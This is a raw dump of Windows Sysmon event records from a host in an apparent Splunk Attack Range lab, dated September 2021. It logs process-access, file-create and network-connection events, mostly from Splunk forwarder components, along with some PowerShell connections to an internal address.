Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.904{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.239{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.204{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D05F34F665F930E5B7F84EDBE78B53D,SHA256=61967650E08207B57D063AE72780A6707013D820A6010D3DA0699EA8AAE48806,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D203BCD4BBD2E3BFC7275B330AFEC4D,SHA256=5DB2536D6639B320B8FD7D082A0ED86056C667D533D60E611A9E5EFE1DEBFEEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.206{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B970E1DD990F5B025B8BF1FB38BFA361,SHA256=E57751DB990B120B9E1CABDA7D2F0DFF4FEABAED4EE85EA23A8D019DEB7B8C73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.056{B81B27B7-4E14-613A-3890-03000000C801}55446720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:30.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5634CFFA4C8AEFD6A60365F99A8BDF07,SHA256=275F4843B10F895B9289AEFCCA42CA4A93D3FD2F502A3C5711939C6CBA41E723,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:30.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=32E7D30E188493D50F89C73CFD578638,SHA256=9B130349ED10A24DAAE9F2BDAAAD0F3453BDD3D75E9FD2516376C5116762F41B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:53.124{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56599-false10.0.1.12-8000- 23542300x800000000000000035084401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:31.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF354B677725C8E29882533C4FB84967,SHA256=F557596472EAD8556681C12305DF8365B353C73CEAB0EEC892A388F107BE5BD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:55.921{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56600-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:33.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964531AD37492AB7D477C51566564A84,SHA256=F0EDD4C92FFC6C5628044B9C91227F985EEDB37DD5B4B6CFF7AD44ADDC04F888,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:59.041{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56601-false10.0.1.12-8000- 23542300x800000000000000035084404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:34.038{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A594EE4F51EF9D15D59BA2DCFA17B41,SHA256=EAAA773636DF3A71EE5731C5C7B5EE4E7A448E20F71089CBC30C67714C274707,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:59.941{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56602-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:35.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31105D31A34DD88CD60E43AC43C66C80,SHA256=CA51130A48DC358231D251D977AB6489E24262C6B86120C687895B8EC69A6407,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:35.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D48B98A4E3BF3B8CBC7B10E9DFC85380,SHA256=ED78DCB8B99203EC2F83FBD2F149352D9E9A1097DCBEAC430CBEC8890F0ABECC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:36.400{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F882EBF5096729B4214A8CC31ACBC93C,SHA256=7820C5165DE18D2C26645A96F22C53C2266B2AADCA4A73ECC73407D9D39F003F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:36.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0E47921203B7AA734C315C40C71F355,SHA256=7784A174677B4DFF954A8223CB23B8345BD152B4DAD7BC3E002867CC4AB49DB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:37.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDD51E6C88AA4EFB4391139B2CBD2DCC,SHA256=C20B0C7322DC2FDB63867363128A811955BEBFB04B6B98B6D0A52EB3122C41F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:38.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8326370E8DF1F0C791514139D574BDF5,SHA256=8A982E45EB7A1BAF940ACC5882DCEBFBA1D80062C3D678A2A46EB26458A6772F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:39.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4454C4284E06F51150FB1B3069FAEF73,SHA256=46022F083C6E512E4981642E923E1F7E47070C6D9283718D09332A4B23328D28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:40.134{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=120D40890B95AF28D3E9C6FDD4DEABEA,SHA256=698881CC5AE6A086DEA70B8C07C8DFAE0DC4DA305ACEFF5E7E39273DC6A521E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:40.019{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6A41D0BC32F70F658F72AEC85155C195,SHA256=A445C286211652972C84143191DC1E573EC560716FCBD7D0FD764D0BF8F5F2D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:41.149{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440C6BB3BDEE89BA463FAD264BB0AA1E,SHA256=5F404FC33D656ABD768FE9B8AC10124704F43250D91C701B708F6E2089BB7D87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:05.069{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56604-false10.0.1.12-8000- 354300x800000000000000035084416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:04.954{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56603-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:42.165{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F972E7D5FAFA1B8F2A4BF132CA8BC1,SHA256=DF49B65996FC1B5C715246FED1863681B6F3F75BAD85EEE6B9A2E9E3BDF79586,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.700{B81B27B7-4E23-613A-3990-03000000C801}69081988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.532{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E23-613A-3990-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.532{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E23-613A-3990-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.532{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.532{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 